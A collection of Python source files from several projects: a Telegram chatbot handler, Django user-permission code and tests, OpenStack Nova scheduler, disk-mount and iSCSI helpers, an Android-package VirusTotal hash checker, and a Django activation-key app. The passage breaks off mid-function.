"source": "77stm77/Houston-bot",
"score": 2
} |
#### File: Houston-bot/houston_bot/handlers.py
```python
import json
import apiai
from config import BaseConfig
class BotHandlers(BaseConfig):
"""Handler bot. """
def start(self, bot, update):
"""Starting message. """
bot.send_message(chat_id=update.message.chat_id, text=self.welcome_text)
def message(self, bot, update):
"""Dialog message. """
request = apiai.ApiAI(self.dialog_token).text_request()
request.lang = self.lang
request.session_id = self.name
request.query = update.message.text
response_json = json.loads(request.getresponse().read().decode('utf-8'))
response = response_json['result']['fulfillment']['speech']
if response:
bot.send_message(chat_id=update.message.chat_id, text=response)
else:
bot.send_message(chat_id=update.message.chat_id, text=self.answer)
``` |
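`BotHandlers.start`/`message` use the `(bot, update)` callback signature of python-telegram-bot versions before 12, so wiring them up would look roughly like the sketch below. `BaseConfig` is not shown in this excerpt, so the `telegram_token` attribute used here is an assumption:
```python
# Hypothetical wiring for BotHandlers, assuming python-telegram-bot < 12.
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from houston_bot.handlers import BotHandlers

handlers = BotHandlers()
updater = Updater(token=handlers.telegram_token)   # attribute name on BaseConfig is assumed
dispatcher = updater.dispatcher
dispatcher.add_handler(CommandHandler("start", handlers.start))
dispatcher.add_handler(MessageHandler(Filters.text, handlers.message))
updater.start_polling()
updater.idle()
```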
{
"source": "780Farva/django_guardian_playground",
"score": 2
} |
#### File: users/migrations/0005_make_admins_group.py
```python
from django.db import migrations
def apply_add_admin_group(apps, schema_editor):
Group = apps.get_model("auth", "Group")
admins_group = Group.objects.create(name=u"admins")
CustomUser = apps.get_model("users", "CustomUser")
staff = CustomUser.objects.filter(is_staff=True)
admins_group.user_set.add(*staff)
def revert_add_admin_group(apps, schema_editor):
Group = apps.get_model("auth", "Group")
    admins_group = Group.objects.get(name=u"admins")
admins_group.user_set.clear()
admins_group.delete()
class Migration(migrations.Migration):
dependencies = [
("auth", "0011_update_proxy_permissions"),
("users", "0004_customuser_remove_uuid_null"),
]
operations = [migrations.RunPython(apply_add_admin_group, revert_add_admin_group)]
```
#### File: users/tests/test_models.py
```python
from django.contrib.auth import get_user_model
from django.test import TestCase
from users.models import CustomUser
from users.models import get_anonymous_user_instance
class AnonymousUserPermissionsTest(TestCase):
def setUp(self):
self.other_user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.anonymous = get_user_model().objects.get(email="<EMAIL>")
def test_anonymous_permissions(self):
# anonymous users can sign up new users
# handled by modelbackend, not guardian
# self.assertTrue(self.anonymous.has_perm("add_customuser"))
# anonymous users can't do anything else to users, really.
self.assertFalse(self.anonymous.has_perm("add_permission"))
self.assertFalse(self.anonymous.has_perm("change_permission"))
self.assertFalse(self.anonymous.has_perm("delete_permission"))
self.assertFalse(self.anonymous.has_perm("view_permission"))
self.assertFalse(self.anonymous.has_perm("change_customuser", self.other_user))
self.assertFalse(self.anonymous.has_perm("delete_customuser", self.other_user))
self.assertFalse(self.anonymous.has_perm("view_customuser", self.other_user))
class CustomUserPermissionsTest(TestCase):
def setUp(self):
admin = CustomUser.objects.create_superuser(
email="<EMAIL>", password="<PASSWORD>"
)
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
other_user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
# Request the users again to ensure the cached permissions on them get busted
self.admin = CustomUser.objects.get(email=admin.email)
self.user = CustomUser.objects.get(email=user.email)
self.other_user = CustomUser.objects.get(email=other_user.email)
def test_admin_permissions(self):
self.assertTrue(self.admin.has_perm("add_user"))
self.assertTrue(self.admin.has_perm("add_customuser"))
self.assertTrue(self.admin.has_perm("add_permission"))
self.assertTrue(self.admin.has_perm("change_permission"))
self.assertTrue(self.admin.has_perm("delete_permission"))
self.assertTrue(self.admin.has_perm("view_permission"))
self.assertTrue(self.admin.has_perm("change_customuser", self.user))
self.assertTrue(self.admin.has_perm("delete_customuser", self.user))
self.assertTrue(self.admin.has_perm("view_customuser", self.user))
self.assertTrue(self.admin.has_perm("change_customuser", self.other_user))
self.assertTrue(self.admin.has_perm("delete_customuser", self.other_user))
self.assertTrue(self.admin.has_perm("view_customuser", self.other_user))
def test_user_permissions(self):
# normal users can't add users
self.assertFalse(self.user.has_perm("add_user"))
self.assertFalse(self.user.has_perm("add_customuser"))
# normal users can't add users mess with permissions
self.assertFalse(self.user.has_perm("add_permission"))
self.assertFalse(self.user.has_perm("change_permission"))
self.assertFalse(self.user.has_perm("delete_permission"))
self.assertFalse(self.user.has_perm("view_permission"))
self.assertFalse(self.user.has_perm("add_permission", self.user))
self.assertFalse(self.user.has_perm("change_permission", self.user))
self.assertFalse(self.user.has_perm("delete_permission", self.user))
self.assertFalse(self.user.has_perm("view_permission", self.user))
# check that normal users have model permissions
self.assertTrue(self.user.has_perm("users.change_customuser"))
self.assertTrue(self.user.has_perm("users.delete_customuser"))
self.assertTrue(self.user.has_perm("users.view_customuser"))
# normal users can change and delete themselves, once guardian has given them permission
self.assertTrue(self.user.has_perm("change_customuser", self.user))
self.assertTrue(self.user.has_perm("delete_customuser", self.user))
self.assertTrue(self.user.has_perm("view_customuser", self.user))
self.assertTrue(self.user.has_perm("users.change_customuser", self.user))
self.assertTrue(self.user.has_perm("users.delete_customuser", self.user))
self.assertTrue(self.user.has_perm("users.view_customuser", self.user))
# normal users can't change other users or their permissions
self.assertFalse(self.user.has_perm("change_customuser", self.other_user))
self.assertFalse(self.user.has_perm("delete_customuser", self.other_user))
self.assertFalse(self.user.has_perm("view_customuser", self.other_user))
self.assertFalse(self.user.has_perm("add_permission", self.other_user))
self.assertFalse(self.user.has_perm("change_permission", self.other_user))
self.assertFalse(self.user.has_perm("delete_permission", self.other_user))
self.assertFalse(self.user.has_perm("view_permission", self.other_user))
class CustomUserUuidTest(TestCase):
def test_username_is_email(self):
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.assertEqual(user.USERNAME_FIELD, "email")
def test_user_gets_uuid(self):
user = CustomUser.objects.create_user(
email="<EMAIL>", password="<PASSWORD>"
)
self.assertIsNotNone(user.uuid)
class AnonyousUserTest(TestCase):
def test_returns_anonymous_user(self):
user = get_anonymous_user_instance(CustomUser)
self.assertEqual(user.email, "<EMAIL>")
self.assertFalse(user.is_staff)
```
#### File: project/users/views.py
```python
from rest_framework.permissions import DjangoObjectPermissions
from rest_framework.viewsets import ModelViewSet
from users.models import CustomUser
from users.serializers import CustomUserSerializer
class CustomObjectPermissions(DjangoObjectPermissions):
"""
Similar to `DjangoObjectPermissions`, but adding 'view' permissions.
"""
perms_map = {
"GET": ["%(app_label)s.view_%(model_name)s"],
"OPTIONS": ["%(app_label)s.view_%(model_name)s"],
"HEAD": ["%(app_label)s.view_%(model_name)s"],
"POST": ["%(app_label)s.add_%(model_name)s"],
"PUT": ["%(app_label)s.change_%(model_name)s"],
"PATCH": ["%(app_label)s.change_%(model_name)s"],
"DELETE": ["%(app_label)s.delete_%(model_name)s"],
}
class CustomUserViewSet(ModelViewSet):
"""
A simple ViewSet for listing or retrieving users.
"""
lookup_field = "uuid"
# must match exactly this regex pattern, including hyphens in their particular places
lookup_value_regex = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
serializer_class = CustomUserSerializer
def get_queryset(self):
user = self.request.user
if user.is_staff:
return CustomUser.objects.all()
return CustomUser.objects.filter(email=user.email)
permission_classes = [CustomObjectPermissions]
``` |
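To expose `CustomUserViewSet` it would typically be registered on a DRF router in the project's `urls.py`; a minimal sketch (the URL prefix and basename are choices made here, not taken from the repo):
```python
# Hypothetical urls.py wiring for the viewset above.
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from users.views import CustomUserViewSet

router = DefaultRouter()
router.register(r"users", CustomUserViewSet, basename="customuser")

urlpatterns = [
    path("api/", include(router.urls)),
]
```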
{
"source": "781778304/nova",
"score": 2
} |
#### File: nova/scheduler/rpcapi.py
```python
from nova import flags
import nova.openstack.common.rpc.proxy
FLAGS = flags.FLAGS
class SchedulerAPI(nova.openstack.common.rpc.proxy.RpcProxy):
'''Client side of the scheduler rpc API.
API version history:
1.0 - Initial version.
'''
BASE_RPC_API_VERSION = '1.0'
def __init__(self):
super(SchedulerAPI, self).__init__(topic=FLAGS.scheduler_topic,
default_version=self.BASE_RPC_API_VERSION)
def run_instance(self, ctxt, topic, request_spec, admin_password,
injected_files, requested_networks, is_first_time,
filter_properties, reservations, call=True):
rpc_method = self.call if call else self.cast
return rpc_method(ctxt, self.make_msg('run_instance', topic=topic,
request_spec=request_spec, admin_password=<PASSWORD>,
injected_files=injected_files,
requested_networks=requested_networks,
is_first_time=is_first_time,
filter_properties=filter_properties,
reservations=reservations))
def prep_resize(self, ctxt, topic, instance_uuid, instance_type_id, image,
update_db, request_spec, filter_properties):
self.cast(ctxt, self.make_msg('prep_resize', topic=topic,
instance_uuid=instance_uuid, instance_type_id=instance_type_id,
image=image, update_db=update_db, request_spec=request_spec,
filter_properties=filter_properties))
def show_host_resources(self, ctxt, host):
return self.call(ctxt, self.make_msg('show_host_resources', host=host))
def live_migration(self, ctxt, block_migration, disk_over_commit,
instance_id, dest, topic):
# NOTE(comstud): Call vs cast so we can get exceptions back, otherwise
# this call in the scheduler driver doesn't return anything.
return self.call(ctxt, self.make_msg('live_migration',
block_migration=block_migration,
disk_over_commit=disk_over_commit, instance_id=instance_id,
dest=dest, topic=topic))
def update_service_capabilities(self, ctxt, service_name, host,
capabilities):
self.fanout_cast(ctxt, self.make_msg('update_service_capabilities',
service_name=service_name, host=host,
capabilities=capabilities))
def get_host_list(self, ctxt):
return self.call(ctxt, self.make_msg('get_host_list'))
```
#### File: virt/disk/guestfs.py
```python
import os
from nova import exception
from nova import utils
from nova.virt.disk import mount
class Mount(mount.Mount):
"""libguestfs support for arbitrary images."""
mode = 'guestfs'
def map_dev(self):
self.mapped = True
return True
def unmap_dev(self):
self.mapped = False
def mnt_dev(self):
try:
partition = int(self.partition or 0)
except ValueError:
self.error = _('unsupported partition: %s') % self.partition
return False
args = ('guestmount', '--rw', '-a', self.image)
if partition == -1:
args += ('-i',) # find the OS partition
elif partition:
args += ('-m', '/dev/sda%d' % partition)
else:
# We don't resort to -i for this case yet,
# as some older versions of libguestfs
# have problems identifying ttylinux images for example
args += ('-m', '/dev/sda')
args += (self.mount_dir,)
        # root access should not be required for guestfs (if the user
        # has permissions to fusermount (by being part of the fuse
        # group for example)). Also note the image and mount_dir
        # have appropriate credentials at this point for read/write
# mounting by the nova user. However currently there are
# subsequent access issues by both the nova and root users
# if the nova user mounts the image, as detailed here:
# https://bugzilla.redhat.com/show_bug.cgi?id=765814
_out, err = utils.trycmd(*args, discard_warnings=True,
run_as_root=True)
if err:
self.error = _('Failed to mount filesystem: %s') % err
# Be defensive and ensure this is unmounted,
# as I'm not sure guestmount will never have
# mounted when it returns EXIT_FAILURE.
# This is required if discard_warnings=False above
utils.trycmd('fusermount', '-u', self.mount_dir, run_as_root=True)
return False
# More defensiveness as there are edge cases where
# guestmount can return success while not mounting
try:
if not os.listdir(self.mount_dir):
# Assume we've just got the original empty temp dir
err = _('unknown guestmount error')
self.error = _('Failed to mount filesystem: %s') % err
return False
except OSError:
# This is the usual path and means root has
# probably mounted fine
pass
self.mounted = True
return True
def unmnt_dev(self):
if not self.mounted:
return
umount_cmd = ['fusermount', '-u', self.mount_dir]
try:
# We make a few attempts to work around other
# processes temporarily scanning the mount_dir etc.
utils.execute(*umount_cmd, attempts=5, run_as_root=True)
except exception.ProcessExecutionError:
# If we still can't umount, then do a lazy umount
# (in the background), so that mounts might eventually
# be cleaned up. Note we'll wait 10s below for the umount to
# complete, after which we'll raise an exception.
umount_cmd.insert(1, '-z')
utils.execute(*umount_cmd, run_as_root=True)
# Unfortunately FUSE has an issue where it doesn't wait
# for processes associated with the mount to terminate.
# Therefore we do this manually here. Note later versions
# of guestmount have the --pid-file option to help with this.
# Here we check every .2 seconds whether guestmount is finished
# but do this for at most 10 seconds.
wait_cmd = 'until ! ps -C guestmount -o args= | grep -qF "%s"; '
wait_cmd += 'do sleep .2; done'
wait_cmd %= self.mount_dir
utils.execute('timeout', '10s', 'sh', '-c', wait_cmd)
self.mounted = False
```
#### File: nova/volume/iscsi.py
```python
from nova import flags
from nova.openstack.common import cfg
from nova import utils
iscsi_helper_opt = cfg.StrOpt('iscsi_helper',
default='tgtadm',
help='iscsi target user-land tool to use')
FLAGS = flags.FLAGS
FLAGS.register_opt(iscsi_helper_opt)
class TargetAdmin(object):
"""iSCSI target administration.
Base class for iSCSI target admin helpers.
"""
def __init__(self, cmd, execute):
self._cmd = cmd
self.set_execute(execute)
def set_execute(self, execute):
"""Set the function to be used to execute commands."""
self._execute = execute
def _run(self, *args, **kwargs):
self._execute(self._cmd, *args, run_as_root=True, **kwargs)
def new_target(self, name, tid, **kwargs):
"""Create a new iSCSI target."""
raise NotImplementedError()
def delete_target(self, tid, **kwargs):
"""Delete a target."""
raise NotImplementedError()
def show_target(self, tid, **kwargs):
"""Query the given target ID."""
raise NotImplementedError()
def new_logicalunit(self, tid, lun, path, **kwargs):
"""Create a new LUN on a target using the supplied path."""
raise NotImplementedError()
def delete_logicalunit(self, tid, lun, **kwargs):
"""Delete a logical unit from a target."""
raise NotImplementedError()
class TgtAdm(TargetAdmin):
"""iSCSI target administration using tgtadm."""
def __init__(self, execute=utils.execute):
super(TgtAdm, self).__init__('tgtadm', execute)
def new_target(self, name, tid, **kwargs):
self._run('--op', 'new',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
'--targetname=%s' % name,
**kwargs)
self._run('--op', 'bind',
'--lld=iscsi', '--mode=target',
'--initiator-address=ALL',
'--tid=%s' % tid,
**kwargs)
def delete_target(self, tid, **kwargs):
self._run('--op', 'delete',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
**kwargs)
def show_target(self, tid, **kwargs):
self._run('--op', 'show',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
**kwargs)
def new_logicalunit(self, tid, lun, path, **kwargs):
self._run('--op', 'new',
'--lld=iscsi', '--mode=logicalunit',
'--tid=%s' % tid,
'--lun=%d' % (lun + 1), # lun0 is reserved
'--backing-store=%s' % path,
**kwargs)
def delete_logicalunit(self, tid, lun, **kwargs):
self._run('--op', 'delete',
'--lld=iscsi', '--mode=logicalunit',
'--tid=%s' % tid,
'--lun=%d' % (lun + 1),
**kwargs)
class IetAdm(TargetAdmin):
"""iSCSI target administration using ietadm."""
def __init__(self, execute=utils.execute):
super(IetAdm, self).__init__('ietadm', execute)
def new_target(self, name, tid, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--params', 'Name=%s' % name,
**kwargs)
def delete_target(self, tid, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
**kwargs)
def show_target(self, tid, **kwargs):
self._run('--op', 'show',
'--tid=%s' % tid,
**kwargs)
def new_logicalunit(self, tid, lun, path, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--lun=%d' % lun,
'--params', 'Path=%s,Type=fileio' % path,
**kwargs)
def delete_logicalunit(self, tid, lun, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
'--lun=%d' % lun,
**kwargs)
def get_target_admin():
if FLAGS.iscsi_helper == 'tgtadm':
return TgtAdm()
else:
return IetAdm()
``` |
{
"source": "783919/MwAn",
"score": 2
} |
#### File: MwAn/AndroidVTProcess/AndroidVTProcess.py
```python
import subprocess
import os
import sys
import ctypes
import winreg
import time
import json
import re
import logging
import hashlib
import requests
BANNER="Android Virus Total Analyzer rel. 0.0.0 by <NAME> (<EMAIL>). Times are in GMT"
#Optional lookup of NIST good files hash list (GFHL)
#First line of file is header:
#"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"
USE_NIST_GFHL=True
NIST_GFHL_FNAME="Hash_Android_RDS_v.2.67.txt"
NIST_GFHL_DELIM="[',']{1}"
NIST_GFHL_SHA1_POS=0
NIST_GFHL_FNAME_POS=3
NIST_GFHL_ALLOWED_FILE_EXT=("apk")
#Already checked packages (ACP). We keep track of mobile phone packages already checked just not to repeat
#from start if malware analysis process interrupts
ACP_FNAME="checked_packages.txt"
#final report file name
REPORT_FNAME="report.txt"
SHA1_MATCH="^([a-fA-F0-9]{40})$"
VT_API_KEY_MATCH="^([a-fA-F0-9]{64})$"
VT_API_KEY=""
VT_FILE_REPORT_URL="https://www.virustotal.com/vtapi/v2/file/report"
POSITIVE_RES="positive"
NEGATIVE_RES="negative"
UNKNOWN_RES="unknown"
##############################################################################
def send_data_to_vt(url,params):
tx_ok=False
r = requests.get(url,params)
if r.status_code==200:
# extracting data in json format
tx_ok=True
return tx_ok,r.json()
elif r.status_code==204:
logging.warning("Response delayed by VT server")
#set tuple members according to desired retry policy
delay=(60,120,180)# doubling time delay policy
#another example:
#delay=(5,5,5,5,5,5,5,5,5,5,5,5,5)#fixed delay policy
#another example:
#delay=(1,2,4,8,16,32,64)# exponential delay retry policy
for dly in delay:
logging.warning("Retrying after {0} seconds...".format(dly))
time.sleep(dly)
r = requests.get(url,params)
if r.status_code==200:
tx_ok=True
return tx_ok,r.json()
elif r.status_code==204:
logging.warning("Response delayed by VT server")
continue
else:
logging.error("Fatal error while talking to Virus Total. Code:{0}".format(r.status_code))
break
logging.error("Too many tx retries. Virus Total Server too busy")
else:
logging.error("Fatal error while talking to Virus Total. Code:{0}".format(r.status_code))
data={}
return tx_ok,data
###############################################################################
def parse_vt_response(resp):
ismatch=False
isunknown=False
if resp["response_code"]==0:
isunknown=True
logging.info("Hash not present in VT database")
logging.debug("Response: {0}".format(resp["verbose_msg"]))
elif resp["positives"]==0:
logging.info(
"No VT engine detected hash as a malware. Total: {0}, Positives: {1}, Link: {2}".
format(resp["total"],resp["positives"],resp["permalink"]))
else:
ismatch=True
logging.info("Positive MATCH !!! {0} engines out of {1} detected hash as a malware. Link: {2}".format(
resp["positives"],resp["total"],resp["permalink"]))
return ismatch,isunknown
#############################################################################################
def process_android_packages(sha1_list_file,nist_good_file_hash_list,
already_checked_file_hash_list):
processed_hashes=0
pos_matches=0
negatives=0
unknown=0
line_num=0
try:
f = open(sha1_list_file, "r")
for line in f:
line_num+=1
if line_num==1:
continue#skip header
cols=re.split("\t",line.replace('\n', ''))
sha1=cols[0]
package=cols[1]
processed_hashes+=1
if len(already_checked_file_hash_list)>0:
if sha1 in already_checked_file_hash_list:
logging.info("Package {0} already checked. No need to query Virus Total".format(package))
r = open(REPORT_FNAME,"a")
r.write(sha1+"\t"+already_checked_file_hash_list[sha1]+"\t"+"cache\n")
r.close()
res=re.split("\t",already_checked_file_hash_list[sha1].replace('\n', ''))
if res[1]==POSITIVE_RES:
pos_matches+=1
elif res[1]==NEGATIVE_RES:
negatives+=1
else:
unknown+=1
continue
if USE_NIST_GFHL:
if sha1 in nist_good_file_hash_list:
logging.info("Package {0} is in NIST good files hash list. No need to query Virus Total".format(package))
r = open(REPORT_FNAME,"a")
                    r.write(sha1+"\t"+nist_good_file_hash_list[sha1]+"\t"+NEGATIVE_RES+"\t"+"good files list\n")
r.close()
negatives+=1
continue
logging.info("Querying Virus Total for package {0} with SHA1 hash: {1}...".format(package,sha1))
PARAMS = {'apikey':VT_API_KEY,'resource':sha1}
tx_ok,data=send_data_to_vt(VT_FILE_REPORT_URL,PARAMS)
if tx_ok:
ismatch,isunknown=parse_vt_response(data)
result=""
if ismatch:
pos_matches+=1#package detected as malware
result=POSITIVE_RES
elif not isunknown:#update list of already checked good packages
result=NEGATIVE_RES
negatives+=1
else:
result=UNKNOWN_RES
unknown+=1
g=open(ACP_FNAME,"a")
g.write(sha1+"\t"+package+"\t"+result+"\n")
g.close()
r = open(REPORT_FNAME,"a")
r.write(sha1+"\t"+package+"\t"+result+"\t"+"online\n")
r.close()
time.sleep(2)
logging.info("Done. Processed packages: {0} . Positives: {1} Negatives: {2} Unknown: {3}".format(
processed_hashes,pos_matches,negatives,unknown))
f.close()
except Exception as ex:
        logging.error("An error occurred. {0}".format(ex.args))
############################################################################################
def read_nist_good_hl_file():
line_num=0
gfhl={}
f = open(NIST_GFHL_FNAME, "r")
for line in f:
if line_num==0:#ignore header
line_num+=1
continue
if line.startswith("#"):#ignore comments
line_num+=1
continue
cols=re.split(NIST_GFHL_DELIM,line.replace('"', ''))
gfhl_sha1=cols[NIST_GFHL_SHA1_POS]
gfhl_fname=cols[NIST_GFHL_FNAME_POS]
if re.match(SHA1_MATCH,gfhl_sha1) and gfhl_fname.endswith(NIST_GFHL_ALLOWED_FILE_EXT):
gfhl[gfhl_sha1]=gfhl_fname
f.close()
return gfhl
############################################################################################
def read_already_checked_packages_file():
cgphl={}
if os.path.isfile(ACP_FNAME):
f = open(ACP_FNAME, "r")
for line in f:
cols=re.split("\t",line.replace('\n', ''))
cgphl[cols[0]]=cols[1]+"\t"+cols[2]
f.close()
return cgphl
############################################################################################
#main
try:
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('log.txt','a'),#append is default anyway
logging.StreamHandler()
])
logging.Formatter.converter = time.gmtime
logging.info(BANNER)
if len(sys.argv)!=3:
raise Exception("Usage: {0} <path to packages sha1 list file> <Virus Total API key>".
format(sys.argv[0]))
sha1_list_file=sys.argv[1]
if not(os.path.exists(sha1_list_file)):
raise Exception("Path {0} is invalid".format(sha1_list_file))
VT_API_KEY=sys.argv[2]
if not re.match(VT_API_KEY_MATCH,VT_API_KEY):
raise Exception("VT_API_KEY syntax is not valid. Valid Virus Total api keys are 64 hex chars")
if len(NIST_GFHL_ALLOWED_FILE_EXT)==0:
raise Exception("Specify at least one file extension")
r = open(REPORT_FNAME,"w")
r.write("SHA1"+"\t"+"PACKAGE NAME"+"\t"+"RESULT"+"\t"+"SOURCE"+"\n")
r.close()
nist_good_file_hash_list={}
already_checked_files=read_already_checked_packages_file()
if USE_NIST_GFHL:
nist_good_file_hash_list=read_nist_good_hl_file()
process_android_packages(sha1_list_file,nist_good_file_hash_list,already_checked_files)
except Exception as ex:
logging.error("An error occurred. {0}".format(ex.args))
``` |
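`process_android_packages()` expects a tab-separated input file whose first line is a header and whose remaining lines are `<sha1>\t<package name>`. A hedged sketch that writes such a file and shows the invocation (the hashes below are well-known dummy SHA-1 values, not real packages):
```python
# Write a sample input file for AndroidVTProcess.py (values are illustrative only).
rows = [
    ("SHA1", "PACKAGE"),                                                  # header line, skipped by the script
    ("da39a3ee5e6b4b0d3255bfef95601890afd80709", "com.example.app.apk"),
    ("356a192b7913b04c54574d18c28d46e6395428ab", "com.example.game.apk"),
]
with open("packages_sha1.txt", "w") as f:
    for sha1, package in rows:
        f.write(sha1 + "\t" + package + "\n")
# Then run (the key must be 64 hex characters):
#   python AndroidVTProcess.py packages_sha1.txt <your VT API key>
```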
{
"source": "784134748/kubernetes-install",
"score": 2
} |
#### File: nano/activation/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
import django.dispatch
from django.conf import settings
from django.db import models
from django.utils.timezone import now as tznow
from nano.activation.signals import key_activated
Q = models.Q
class ActivationError(Exception):
pass
class ActivationKeyError(ActivationError):
pass
def activate(keystring, user):
"""Attempts to activate a specific key for user, returns activated key on activation,
raises an exception otherwise"""
try:
key = Key.objects.get(key=keystring)
except Key.DoesNotExist:
raise ActivationKeyError('Key %s does not exist, typo?' % keystring)
key.activate(user)
return key
class KeyManager(models.Manager):
def expired(self):
now = tznow()
return self.get_queryset().exclude(expires=None).filter(expires__lte=now)
def available(self):
now = tznow()
return self.get_queryset().filter(Q(expires__gt=now)|Q(expires=None)).filter(activated=None)
def activated(self):
now = tznow()
return self.get_queryset().exclude(activated=None)
def activate(self, *args):
return activate(*args)
@python_2_unicode_compatible
class Key(models.Model):
key = models.CharField(max_length=255)
group = models.SlugField(max_length=32, blank=True, null=True)
pub_date = models.DateTimeField(auto_now_add=True)
expires = models.DateTimeField(blank=True, null=True)
activated = models.DateTimeField(blank=True, null=True)
activated_by = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='activation_keys')
objects = KeyManager()
class Meta:
db_table = 'nano_activation_code'
ordering = ('-pub_date',)
get_latest_by = 'pub_date'
def __str__(self):
pp_pub_date = self.pub_date
pp_expires = self.expires or ''
return "%s (%s) %s %s" % (self.key, self.group, pp_pub_date, pp_expires)
def activate(self, user):
"""Activates a specific key for user, returns activated key on activation,
raises an exception otherwise"""
now = tznow()
if self.expires and self.expires <= now:
raise ActivationKeyError('Key expired on %s' % self.expires)
if self.activated:
raise ActivationKeyError('Key has already been activated')
self.activated_by = user
self.activated = now
self.save()
key_activated.send_robust(sender=self, user=user, group=self.group)
return self
```
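A short sketch of how the module-level `activate()` helper might be called, e.g. from a view or management command; `redeem()` below is a hypothetical wrapper, not part of the app:
```python
# Minimal usage sketch for nano.activation.
from nano.activation.models import Key, activate, ActivationKeyError

def redeem(user, keystring):
    """Try to activate `keystring` for `user`; return (ok, message)."""
    try:
        key = activate(keystring, user)
    except ActivationKeyError as e:
        return False, str(e)
    return True, "Activated key in group %r" % key.group

# Keys are typically created up front, optionally with an expiry:
#   Key.objects.create(key="SOME-GENERATED-KEY", group="beta")
```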
#### File: nano/activation/tests.py
```python
from __future__ import unicode_literals
from unittest import TestCase as LightTestCase
from datetime import timedelta
from django.test import TestCase
from django.contrib.auth.models import User
from django.utils.timezone import now as tznow
from nano.activation.models import activate, Key, ActivationKeyError
from nano.activation import to_base, NUMERALS, generate_keys, baseNgenerator
class KeyTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
def test_str(self):
item = Key.objects.create(key='test')
pub_date = item.pub_date
expected = "test (None) %s %s" % (pub_date, '')
self.assertEqual(str(item), expected)
def test_activate_method(self):
item = Key.objects.create(key='test')
item.activate(self.user)
self.assertIsNotNone(item.activated)
def test_activate_method_already_activated(self):
item = Key.objects.create(key='test')
item.activate(self.user)
with self.assertRaises(ActivationKeyError) as error:
item.activate(self.user)
self.assertEqual(error, 'Key has already been activated')
def test_activate_function(self):
with self.assertRaises(ActivationKeyError) as error:
activate('foo', self.user)
self.assertEqual(error, 'Key foo does not exist, typo?')
item = Key.objects.create(key='bar')
item = activate(item.key, self.user)
self.assertIsNotNone(item.activated)
def test_activate_expired_key(self):
now = tznow()
item = Key(key='test', expires=now)
with self.assertRaises(ActivationKeyError) as error:
item.activate(self.user)
self.assertEqual(error, 'Key expired on %s' % item.expires)
class KeyManagerTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
self.keys = []
for i in range(10):
key = Key.objects.create(key=str(i))
self.keys.append(key)
def test_get_all_keys(self):
result1 = Key.objects.order_by('id')
self.assertEqual(self.keys, list(result1))
result2 = Key.objects.available().order_by('id')
self.assertEqual(self.keys, list(result2))
self.assertEqual(list(result1), list(result2))
def test_get_expired_keys(self):
now = tznow() - timedelta(days=1)
for key in self.keys[5:]:
key.expires = now
key.save()
self.assertEqual(
list(Key.objects.expired().order_by('id')),
self.keys[5:]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[:5]
)
def test_get_activated_keys(self):
now = tznow()
for key in self.keys[5:]:
key.activated = now
key.save()
self.assertEqual(
list(Key.objects.activated().order_by('id')),
self.keys[5:]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[:5]
)
def test_activate_keys(self):
now = tznow() - timedelta(days=1)
for i in range(5):
Key.objects.activate(str(i), self.user)
self.assertEqual(
list(Key.objects.activated().order_by('id')),
self.keys[:5]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[5:]
)
# Expired key
self.keys[-1].expires = now
self.keys[-1].save()
with self.assertRaises(ActivationKeyError) as error:
Key.objects.activate(self.keys[-1].key, self.user)
self.assertEqual(error, 'Key expired on %s' % now)
# Activated key
with self.assertRaises(ActivationKeyError) as error:
Key.objects.activate(self.keys[0].key, self.user)
self.assertEqual(error, 'Key has already been activated')
class FunctionTest(LightTestCase):
def test_to_base(self):
# must succeed
result, expected = to_base(0, 20), '0'
self.assertEqual(result, expected)
result, expected = to_base(7, 1), '1'*7
self.assertEqual(result, expected)
result, expected = to_base(7, 5), '12'
self.assertEqual(result, expected)
result, expected = to_base(-7, 5), '-12'
self.assertEqual(result, expected)
# must fail
with self.assertRaises(ValueError) as error:
maxbase = len(NUMERALS)
result, expected = to_base(7, maxbase+1)
self.assertEqual(error, "<base> must be in the range [1, %i>" % maxbase)
with self.assertRaises(ValueError) as error:
result, expected = to_base('q', 10)
self.assertEqual(error, 'invalid literal for int() with base 10: \'q\'')
with self.assertRaises(ValueError) as error:
result, expected = to_base(1, 'q')
self.assertEqual(error, 'invalid literal for int() with base 10: \'q\'')
def test_generate_keys(self):
amount = 10
result = generate_keys(baseNgenerator(), amount=amount)
self.assertEqual(amount, len(set(result)))
```
#### File: badge/templatetags/badge_tags.py
```python
from __future__ import unicode_literals
from math import ceil
from django import template
from django.core.urlresolvers import reverse
from nano.badge.models import Badge
from nano.tools import grouper
register = template.Library()
# \u25cf BLACK CIRCLE
# \u26ab MEDIUM BLACK CIRCLE (not as common)
SYMBOLS = {
100: '\u25cf',
200: '\u25cf',
300: '\u25cf',
}
SYMBOL_NAMES = {
100: 'bronze',
200: 'silver',
300: 'gold',
}
def sum_badges(user):
levels = {}
for badge in user.badges.all():
levels[badge.level] = levels.setdefault(badge.level, 0) + 1
return levels
def get_badges_for_user(user):
inner_template = '<span class="b%i" title="%s %s badge%s">%s</span>%i'
levels = sum_badges(user)
sorted_levels = reversed(sorted(levels.keys()))
badge_list = []
for level in sorted_levels:
name = SYMBOL_NAMES[level]
symbol = SYMBOLS[level]
num_levels = levels[level]
